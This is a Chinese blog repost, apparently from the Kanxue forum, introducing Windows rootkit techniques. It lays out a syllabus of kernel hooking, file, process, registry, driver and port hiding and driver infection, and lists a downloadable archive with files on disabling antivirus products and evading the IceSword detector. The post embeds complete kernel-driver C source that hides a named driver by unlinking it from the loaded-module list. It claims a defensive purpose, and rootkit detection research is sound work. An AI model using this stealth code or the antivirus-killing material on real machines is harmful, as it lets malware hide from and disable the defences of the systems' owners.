Rootkit的学习与研究--简介和学习电子书籍

最新推荐文章于 2024-05-04 17:36:27 发布
最新推荐文章于 2024-05-04 17:36:27 发布
阅读量1.5k 收藏 4
点赞数
分类专栏: Visual C++信息安全编程 网络安全 文章标签: hook windows dll object table command
Rootkit是什么?估计很多朋友并不明白,简单的说,Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。Rootkit通过加载特殊的驱动,修改系统内核,进而达到隐藏信息的目的。技术是双刃剑,我们研究它的目的在于,透过我们的研究,用这项技术来保护我们的系统,使我们的系统更加健壮,充分发挥这个技术的正面应用。

对于ROOTKIT专题的研究,主要涉及的技术有如下部分:
  
1. 内核hook
   对于hook,从ring3有很多,ring3到ring0也有很多,根据api调用环节递进的顺序,在每一个环节都有hook的机会,可以有int 2e或者sysenter hook,ssdt hook,inline hook ,irp hook,object hook,idt hook等等。
   1)object hook
   2)ssdt hook
   3)inline-hook
   4)idt hook
   5)IRP hook
   6)SYSENTER hook
   7)IAT HOOK
   8)EAT HOOK

2. 保护模式篇章第一部分: ring3进ring0之门
   1)通过调用门访问内核
   2)通过中断门访问内核
   3)通过任务门访问内核
   4)通过陷阱门访问内核


3。保护模式篇章第二部分:windows分页机制
   1)windows分页机制
   
4。保护模式篇章第三部分:直接访问硬件
   1)修改iopl,ring3直接访问硬件
   2)追加tss默认I/O许可位图区域
   3)更改tss I/O许可位图指向

5。detour 修改函数执行路径,可用于对函数的控制流程进行重定路径。
   1)detour补丁
   

6. 隐身术
   1)文件隐藏
   2)进程隐藏
   3)注册表键值隐藏
   4)驱动隐藏
   5)进程中dll模块隐藏
   6)更绝的隐藏进程中的dll模块,绕过IceSword的检测
   7)端口隐藏
  
7。ring0中调用ring3程序
  1) apc方式
  2) deviceiocontrol 方式

8。进程线程监控
  1)监控进程创建
  2)杀线程
  3)保护进程和屏蔽文件执行   

9。其他
  1)获取ntoskrnl.exe模块地址的几种办法
  2)驱动感染技术扫盲
  3)shadow ssdt学习笔记
  4)高手进阶windows内核定时器之一
  5)高手进阶windows内核定时器之二
  6)运行期修改可执行文件的路径和Command Line
  7)查找隐藏驱动
  8)装载驱动的几种办法
  9)内核中注入dll的一种流氓方法
  10)另一种读写进程内存空间的方法
  11)完整驱动感染代码
  12)Hook Shadow SSDT
  13)ring0检测隐藏进程

电子书里面内容:
└─Rootkit
    ├─1。 内核hook
    │  ├─1)object hook
    │  │      1)object hook.doc
    │  │
    │  ├─2)ssdt hook
    │  │      2)ssdt hook.doc
    │  │      SSDT Hook的妙用-对抗ring0 inline hook .doc
    │  │      swk0207.rar
    │  │
    │  ├─3)inline-hook
    │  │      360SuperKill学习之--恢复FSD的IRP处理函数.doc
    │  │      3)inline-hook.doc
    │  │      cnnic.rar
    │  │      ExpLookupHandleTableEntry.rar
    │  │      ExpLookupHandleTableEntry2.rar
    │  │      kill_SecuritySoftware.rar
    │  │      PsLookupProcessByProcessId执行流程学习笔记.doc
    │  │      句柄啊,3层表啊,ExpLookupHandleTableEntry啊.doc
    │  │      干掉KV 2008, Rising等大部分杀软.doc
    │  │      搜索未导出的函数地址.doc
    │  │
    │  ├─4)idt hook
    │  │      bhwin_keysniff.rar
    │  │      IDT Hook .doc
    │  │
    │  ├─5)IRP hook
    │  │      5)IRP hook.doc
    │  │      irphook1.rar
    │  │      irphook2.rar
    │  │      irphook3.rar
    │  │
    │  ├─6)SYSENTER hook
    │  │      6)SYSENTER hook.doc
    │  │      SysEnterHook.rar
    │  │
    │  ├─7)IAT HOOK
    │  │      7)IAT HOOK.doc
    │  │      HybridHook.rar
    │  │      testtest.rar
    │  │
    │  └─8)EAT HOOK
    │          8)EAT HOOK.doc
    │          利用导出表来禁止一些驱动程序的加载.doc
    │          导出表钩子.rar
    │
    ├─2。保护模式篇章第一部分: ring3进ring0之门
    │  ├─1)通过调用门访问内核
    │  │      1)通过调用门访问内核.doc
    │  │      myCallGate.rar
    │  │      test.rar
    │  │
    │  ├─2)通过中断门访问内核
    │  │      2)通过中断门访问内核.doc
    │  │      myIntGate.rar
    │  │
    │  ├─3)通过任务门访问内核
    │  │      3)通过任务门访问内核.doc
    │  │      MyTaskGate.rar
    │  │
    │  └─4)通过陷阱门访问内核
    │          4)通过陷阱门访问内核.doc
    │          exe.rar
    │          src.rar
    │
    ├─3。保护模式篇章第二部分:windows分页机制
    │      1)windows分页机制.doc
    │
    ├─4。保护模式篇章第三部分:直接访问硬件
    │  ├─1)修改iopl,ring3直接访问硬件
    │  │      1)修改iopl,ring3直接访问硬件.doc
    │  │      drv.rar
    │  │      exe.rar
    │  │
    │  ├─2)追加tss默认IO许可位图区域
    │  │      2)追加tss默认IO许可位图区域.doc
    │  │      drv.rar
    │  │
    │  └─3)更改tss IO许可位图指向
    │          3)更改tss IO许可位图指向.doc
    │          modifyiopmbase.rar
    │          porttalk.rar
    │
    ├─5。detour 修改函数执行路径,可用于对函数的控制流程进行重定路径。
    │  └─1)detour补丁
    │          1)detour补丁.doc
    │          Inline HOOK SeSinglePrivilegeCheck.rar
    │
    ├─6. 隐身术
    │  ├─1)文件隐藏
    │  │      1)文件隐藏.doc
    │  │
    │  ├─2)进程隐藏
    │  │      2)进程隐藏.doc
    │  │
    │  ├─3)注册表键值隐藏
    │  │      3)注册表键值隐藏.doc
    │  │      BypassRegMon.rar
    │  │      BypassRegMon2[1].idb.rar
    │  │      BypassRegMon_src.rar
    │  │      drv.rar
    │  │      HIVE文件读写.rar
    │  │      HIVE格式.rar
    │  │      HIVE格式解析.doc
    │  │      注册表监控弱点演示程序 v0.2 逆向ASM源码及相关资料.doc
    │  │
    │  ├─4)驱动隐藏
    │  │      4)驱动隐藏.doc
  1. 驱动隐藏的代码附件里没有,这里把代码贴上,来源于看雪:
  2. /*
  3.   * 【作者:莫灰灰(LSG)】
  4.   * 【空间:http://hi.baidu.com/hu3167343】
  5.   */

  7. #include <ntddk.h>

  9. typedef unsigned long DWORD;

  11. typedef struct _KLDR_DATA_TABLE_ENTRY {
  12.      LIST_ENTRY InLoadOrderLinks;
  13.      PVOID ExceptionTable;
  14.      ULONG ExceptionTableSize;
  15.      PVOID GpValue;
  16.      DWORD UnKnow;
  17.      PVOID DllBase;
  18.      PVOID EntryPoint;
  19.      ULONG SizeOfImage;
  20.      UNICODE_STRING FullDllName;
  21.      UNICODE_STRING BaseDllName;
  22.      ULONG Flags;
  23.      USHORT LoadCount;
  24.      USHORT __Unused5;
  25.      PVOID SectionPointer;
  26.      ULONG CheckSum;
  27.      PVOID LoadedImports;
  28.      PVOID PatchInformation;
  29. } KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY;

  31. PDRIVER_OBJECT pDriverObject = NULL;

  33. VOID
  34. HideDriver()
  35. {
  36.      PKLDR_DATA_TABLE_ENTRY entry =(PKLDR_DATA_TABLE_ENTRY)pDriverObject->DriverSection;
  37.      PKLDR_DATA_TABLE_ENTRY firstentry;
  38.      UNICODE_STRING uniDriverName;
  39.      
  40.      firstentry = entry;

  42.      // 初始化要隐藏驱动的驱动名
  43.      RtlInitUnicodeString(&uniDriverName, L"XueTr.sys");
  44.      
  45.      while((PKLDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink != firstentry)
  46.      {
  47.          if (entry->FullDllName.Buffer != 0)
  48.          {   
  49.              if (RtlCompareUnicodeString(&uniDriverName, &(entry->BaseDllName), FALSE) == 0)
  50.              {
  51.                  KdPrint(("隐藏驱动 %ws 成功!\n", entry->BaseDllName.Buffer));   
  52.                  // 修改 Flink 和 Blink 指针, 以跳过我们要隐藏的驱动
  53.                  *((DWORD*)entry->InLoadOrderLinks.Blink) = (DWORD)entry->InLoadOrderLinks.Flink;
  54.                  entry->InLoadOrderLinks.Flink->Blink = entry->InLoadOrderLinks.Blink;
  55.                  
  56.                  /*
  57.                      使被隐藏驱动LIST_ENTRY结构体的Flink, Blink域指向自己
  58.                      因为此节点本来在链表中, 那么它邻接的节点驱动被卸载时,
  59.                      系统会把此节点的Flink, Blink域指向它相邻节点的下一个节点.
  60.                      但是, 它此时已经脱离链表了, 如果现在它原本相邻的节点驱动被
  61.                      卸载了, 那么此节点的Flink, Blink域将有可能指向无用的地址, 而
  62.                      造成随机性的BSoD.
  63.                  */
  64.                  entry->InLoadOrderLinks.Flink = (LIST_ENTRY*)&(entry->InLoadOrderLinks.Flink);
  65.                  entry->InLoadOrderLinks.Blink = (LIST_ENTRY*)&(entry->InLoadOrderLinks.Flink);

  67.                  break;
  68.              }
  69.          }
  70.          // 链表往前走
  71.          entry = (PKLDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink;
  72.      }
  73. }

  75. NTSTATUS
  76. UnloadDriver(
  77.               IN PDRIVER_OBJECT DriverObject
  78.               )
  79. {
  80.      return STATUS_SUCCESS;
  81. }

  83. NTSTATUS
  84. DriverEntry(
  85.              IN PDRIVER_OBJECT DriverObject,
  86.              IN PUNICODE_STRING  RegistryPath
  87.              )
  88. {
  89.      DriverObject->DriverUnload = UnloadDriver;
  90.      pDriverObject = DriverObject;
  91.      HideDriver();
  92.      return STATUS_SUCCESS;
  93. }
复制代码
│  │
    │  ├─5)进程中dll模块隐藏
    │  │      5)进程中dll模块隐藏.doc
    │  │
    │  ├─6)更绝的隐藏进程中的dll模块,绕过IceSword的检测
    │  │      6)更绝的隐藏进程中的dll模块,绕过IceSword的检测.doc
    │  │
    │  └─7)端口隐藏
    │          7)端口隐藏.doc
    │
    ├─7。ring0中调用ring3程序
    │  ├─1) apc方式
    │  │      1) apc方式 .doc
    │  │      KernelExec.rar
    │  │
    │  └─2) deviceiocontrol 方式
    ├─8。进程线程监控
    │  ├─1)监控进程创建
    │  │      1)监控进程创建.doc
    │  │      protect.rar
    │  │
    │  ├─2)杀线程
    │  │      2)杀线程.doc
    │  │
    │  └─3)保护进程和屏蔽文件执行
    │          3)保护进程和屏蔽文件执行  .doc
    │          sysnap.rar
    │
    └─9。其他
        ├─10)另一种读写进程内存空间的方法
        │      10)另一种读写进程内存空间的方法.doc
        │
        ├─11)完整驱动感染代码
        │      11)完整驱动感染代码.doc
        │      驱动感染成功[1].V 1.0.080528_sudami.rar
        │
        ├─12)Hook Shadow SSDT
        │      12)Hook Shadow SSDT.doc
        │      HookShadowSSDT.rar
        │
        ├─13)ring0检测隐藏进程
        │      13)ring0检测隐藏进程.doc
        │      Ring0下搜索内存枚举隐藏进程.doc
        │
        ├─1)获取ntoskrnl.exe模块地址的几种办法
        │      1)获取ntoskrnl.exe模块地址的几种办法.doc
        │
        ├─2)驱动感染技术扫盲
        │      2)驱动感染技术扫盲.doc
        │      InfectDriver.rar
        │
        ├─3)shadow ssdt学习笔记
        │      3)shadow ssdt学习笔记.doc
        │
        ├─4)高手进阶windows内核定时器之一
        │      4)高手进阶windows内核定时器之一.doc
        │      WorkItem.rar
        │
        ├─5)高手进阶windows内核定时器之二
        │      5)高手进阶windows内核定时器之二.doc
        │      TimerWorks.rar
        │
        ├─6)运行期修改可执行文件的路径和Command Line
        │      6)运行期修改可执行文件的路径和Command Line.doc
        │      ImgPathChanger.rar
        │
        ├─7)查找隐藏驱动
        │      7)查找隐藏驱动.doc
        │
        ├─8)装载驱动的几种办法
        │      8内核模式下装载驱动和原生态应用程序.pdf
        │      8)装载驱动的几种办法.doc
        │      Loading drivers and Native applications from kernel mode, withou
t touching registry.rar
        │
        └─9)内核中注入dll的一种流氓方法
                9)内核中注入dll的一种流氓方法.doc
                Apc.rar

Rootkit.rar (6.06 MB, 下载次数: 4208)
2011-5-27 00:11:28 上传
下载次数: 4208

RooKit.pdf (3.64 MB, 下载次数: 2097)
2011-5-29 22:41:42 上传
下载次数: 2097
为大家做了个PDF的文档,方便阅读,O(∩_∩)O~
注:来自看雪学院

cosmoslife
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
白帽子Android渗透测试指南
程序员光剑
08-06 708
随着智能手机的普及和移动互联网的快速发展,Android系统作为全球市场占有率最高的移动操作系统,其安全性越来越受到人们的重视。与此同时,针对Android系统的恶意软件和攻击手段也层出不穷,给用户的信息安全和隐私保护带来了极大的威胁。为了帮助广大开发者和安全爱好者更好地了解Android系统的安全机制,掌握Android渗透测试的基本方法和技巧,本文将从白帽子的角度出发,详细介绍Android渗透测试的流程、技术和工具,并结合实际案例进行分析和讲解。
Rootkit学习研究【转自看雪】
许落
01-18 1001
Rootkit是什么?估计很多朋友并不明白,简单的说,Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。Rootkit通过加载特殊的驱动,修改系统内核,进而达到隐藏信息的目的。技术是双刃剑,我们研究它的目的在于,透过我们的研究,用这项技术来保护我们的系统,使我们的系统更加健壮,
(推荐书籍)Rootkits——Windows内核的安全防护
04-28 2808
Rootkits——Windows内核的安全防护 书名:Rootkits——Windows内核的安全防护 作者:(美)霍格兰德(Hoglund, G.),(美)巴特勒(Butler, J.)著;韩智文译 来源:清华大学出版社 出版时间:2007年04月 ISBN:9787302146520 定价:39元
rootkit入门(翻译)
gzfqh的专栏 →底层代码研究
11-15 7917
常见问题解答 : 如何入门?来源:rootkit_com 作者:Clandestiny 翻译:fqh “Help!我是一名新手!我需要一款rootkit入侵朋友的机器…我想编写自己的rootkit…我想开始开发代码… 该从哪里入手?”此类问题在rootkit.com上不断地出现,并且重复回答一些人问的相同问题浪费了大量时间,我想到我们应当编辑一个短小的文档来对它们进行一般性的叙述。下面的论述远非完
《【专题Rootkit学习研究》文章整理下载
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
06-18 927
花了几个小时把combojiang的ROOTKIT专题整理出来,方便自己收集资料 以下是文件的目录 D:. │  Read me.txt │  目录里面的文件.txt │ └─Rootkit     ├─1。 内核hook     │  ├─1)object hook     │  │      1)object hook.doc     │  │     │  ├─2)ss
Rootkit
热门推荐
tiandyoin的专栏
07-14 1万+
Rootkit自身也是木马后门或恶意程序的一类,只是,它很特殊,为什么呢?因为,你无法找到它。 正如自然界的规则一样,最流行的病毒,对生物的伤害却是最小的,例如一般的感冒,但是最不流行的病毒,却是最夺命的。Rootkit木马就是信息世界里的 AIDS,一旦感染,就难以用一般手段消灭了,因为它和自然界里的同类做的事情一样,破坏了系统自身检测的完整性——抛开术语的描述也许难以理解,但是可以配合AID
Rootkits--Windows内核的安全防护(电子版)
11-22
### Rootkits -- Windows内核的安全防护 ...通过学习本书,读者不仅可以了解到当前最先进的Rootkit技术和工具,还能掌握有效的检测与防范策略,这对于提高个人或组织的网络安全水平具有重要意义。
计算机网络攻防技术的分析与研究
zjy123078_zjy的博客
10-07 5282
Abstract:This article mainly introduces Windows system vulnerability attack and defense, Trojan attack and defense, virus attack and defense, backdoor attack and defense, smart phone virus and Trojan attack and defense, will introduce the causes, character
2024年运维最全【运维安全】Linux下rootkit把木马程序的使用(4),【性能优化实战】
最新发布
2301_79054215的博客
05-04 698
最全的Linux教程,Linux从入门到精通第一份《Linux从入门到精通》466页内容简介====本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。本书第1版出版后曾经多次印刷,并被51CTO读书频道评为“最受读者喜爱的原创IT技术图书奖”。本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。本书附带1张光盘,内容为本书配套多媒体教学视频。
云环境下的入侵检测系统:文献综述及未来研究方向
International Journal of Information Management Data Insights 2(2022)100134审查云环境下的入侵检测系统:文献综述及未来研究方向Suman Lataa,1,Dheerendra Singhb印度昌迪加尔160019工程技术学院研究学者b...
Rootkit.rar
05-08
一些关于Rootkit的一些资料,非常不错。
window内核监控工具源代码
09-26
一:SSDT表的hook检测和恢复 ~!~~~ 二:IDT表的hook检测和恢复 ~~~~~~(idt多处理器的恢复没处理,自己机器是单核的,没得搞,不过多核的列举可以) 三:系统加载驱动模块的检测 通过使用一个全局hash表(以DRIVEROBJECT为对象)来使用以下的方法来存储得到的结果,最终显示出来 1.常规的ZwQuerySystemInformation来列举 2通过打开驱动对象目录来列举 3搜索内核空间匹配驱动的特征来列举(这个功能里面我自己的主机一运行就死机,别的机器都没事,手动设置热键来蓝屏都不行,没dump没法分析,哎,郁闷) 4从本驱动的Modulelist开始遍历来列举驱动 :进程的列举和进程所加载的dll检测 采用以下方法来列举进程: 1ZwQuerySystemInformation参数SystemProcessesAndThreadsInformation来枚举 2进程EPROCESS 结构的Activelist遍历来枚举 3通过解析句柄表来枚举进程 4通过Handletablelisthead枚举进程 5进程创建时都会向csrss来注册,从这个进程里面句柄表来枚举进程 6通过自身进程的HANDLETABLE来枚举进程 7通过EPROCESS的SessionProcessLinks来枚举进程 8通过EPROCESS ---VM---WorkingSetExpansionLinks获取进程 9暴力搜索内存MmSystemRangeStart以上查找PROCESS对象 进程操作: 进程的唤醒和暂停通过获取PsSuspendProcess和PsResumeProcess来操作的 进程结束通过进程空间清0和插入apc。 采用以下方法查找DLL: 1遍历VAD来查找dll 2挂靠到对应的进程查找InLoadOrderLinks来枚举dll 3暴力搜索对应进程空间查找pe特征来枚举dll DLL的操作: Dll的卸载是通过MmUnmapViewOfSection和MmmapViewOfSection(从sdt表中相应函数搜索到的)来实现的(本来想直接清0 dll空间,有时行有时不行)(只要将这个进程的ntdll卸载了,进程就结束了,一个好的杀进程的办法撒,绿色环保无污染),注入dll使用的是插入apc实现的。(注入的dll必须是realse版的。Debug版会出现***错误,全局dll注入貌似也是)插入apc效果不是很好,要有线程有告警状态才执行。 五:线程信息的检测 遍历ThreadList来枚举线程 线程的暂停和唤醒都是通过反汇编获取PsResumeThread和PsSuspendThread直接从r3传来ETHREAD来操作的,通过插入APC来结束线程 六:shadow sdt表的hook检测与恢复 没有采用pdb来解决函数名问题,直接写入xp和03的shandow表函数名(主要是自己的网不稳定,连windbg有时都连不上微软) 七:系统所有的过滤驱动的检测 查看各device下是否挂接有驱动之类的,可直接卸载 八:系统常用回调历程的检测和清除 只检查了PsSetLoadImageNotifyRoutine PsSetCreateThreadNotifyRoutine PsSetCreateProcessNotifyRoutine CmRegisterCallback这几个,至于那个什么shutdown回调不知道是啥玩意,就没搞了,有知道的顺便告诉我下撒,谢谢 九:文件系统fat和ntfs的分发函数检测 直接反汇编fat和ntfs的DriverEntry得到对应的填充分发的偏移,然后和当前已经运行的文件系统的分发相比是否被hook,并附带恢复 十:文件查看功能 自己解析ntfs和fat的结构,来实现列举文件和直接写磁盘删除。附带有普通的删除和发生IRP来删除。不过这里面有点问题,ntfs删除有时把目录给搞坏了,大家凑合着吧, Ntfs网上删除这些操作的代码不多,就是sudami大大的利用ntfs-3g来实现的,看了下,太多了,充满了结构。然后自己对照着系统删除文件时目录的变化来自己实现的。只处理了$BITMAP对应的位清除,父目录的对应文件的索引项的覆盖,删除文件对应的filerecord清0. 另外偷懒时间都没处理,呵呵,y的,一个破时间都都搞好几个字节移来移去的。 十一:常用内核模块钩子的检测和恢复 这里只检测了主要的内核模块nkrnlpa**.exe的.win32k.sys,hal.dll,比对它们的原始文件从而查找eat inline hook,iat hook ,和inline hook。Inline是从TEXT段开始一段位置开始比较的。(有点慢貌似,等待显示扫描完成就好了) 十二:应用层进程所加载dll的钩子 应用层钩子检测和内核模块钩子检测原理一样,不过为了能读写别的进程的空间,并没有使用openprocess去打开进程,而是通过KiattachProcess挂靠到当前进程,然后通过在r0直接读写进程空间的。
检测端口是否被占用源码(C++)
04-01
1、用于检测当前系统的端口是否被占用。 2、获取系统各个端口的状态
每日一书丨Rootkit和Bootkit:现代恶意软件逆向分析和下一代威胁
Piotr_ce的博客
03-03 2431
网络犯罪集团和恶意行为者将继续编写更加持久和隐蔽的攻击程序,攻防之战远没有结束! 微软Windows操作系统的防御能力演进,使得Rootkit和Bootkit设计的几个主要分支陷入了死胡同。 以BIOS和芯片组固件为攻击目标的新型恶意软件出现,这已经超出了当前Windows安全防护软件的能力范围。 越来越多的安全工程师对高级可持续恶意软件威胁如何绕过操作系统级别的安全机制感兴趣。那么,如何发现并逆向、有效分析这些高级威胁? 这里我们介绍一本新书《Rootkit和Bootkit:现代恶意软件逆向分.
新书推荐 |《Linux系统安全:纵深防御、安全扫描与入侵检测》
华章IT官方博客
08-15 764
新书推荐《Linux系统安全:纵深防御、安全扫描与入侵检测》点击上图了解及购买资深Linux系统安全/运维专家撰写,腾讯、阿里技术专家高度评价,从纵深防御、安全扫描、入侵检测3个维度阐释...
【赠书抽奖】Rootkit和Bootkit:现代恶意软件逆向分析和下一代威胁
漏洞战争
02-26 372
导读:网络犯罪集团和恶意行为者将继续编写更加持久和隐蔽的攻击程序,攻防之战远没有结束!内容简介:一本囊括灵活的技巧、操作系统架构观察以及攻击者和防御者创新所使用的设计模式的书,基于三位出色...
全面解析恶意软件 从rootkit到bootkit
10-27 1913
 作者: Noah Schiffman,  出处:TechTarget,  如今最致命类型的恶意代码就是"Rootkit" ,这种恶意可以获得"root"权限,并部署恶意程序的可执行的软件包,Rootkit是如何危害用户的呢……  【IT专家网独家】可以说,如今最复杂,最致命类型的恶意代码就是"Rootkit" 。顾名思义,这种恶意可以获得"root"权限,在unix系统中最高
如何0基础自学网络安全技术,推荐一个非常稳的网络安全学习路线_网络安全入门学习路线(1)
m0_62673499的博客
04-12 722
为了帮助大家更好的学习Python,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以****************点击免费领取****************(如遇扫码问题,可以在评论区留言领取哦)~
DeviceIoControl的使用说明
weixin_34314962的博客
01-09 259
应用程序和驱动程序的通信过程是:应用程序使用CreateFile函数打开设备,然后用DeviceIoControl与驱动程序进行通信,包括读和写两种操作。还可以用ReadFile读数据用WriteFile写数据。操作完毕时用CloseHandle关闭设备。我们比较常用的就是用DeviceIoControl对设备进行读写操作。先看看DeviceIoControl是怎么定义的: BOOL Devic...
Windows内核层Anti-Rootkits:检测与对抗技术研究
本文主要探讨了在Windows操作系统内核层面上对抗Rootkits的研究与实现。Rootkits是一种恶意软件,旨在隐藏自身和其他恶意程序的存在,通常通过篡改操作系统核心组件来逃避传统杀毒软件的检测。随着Windows系统的普及...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值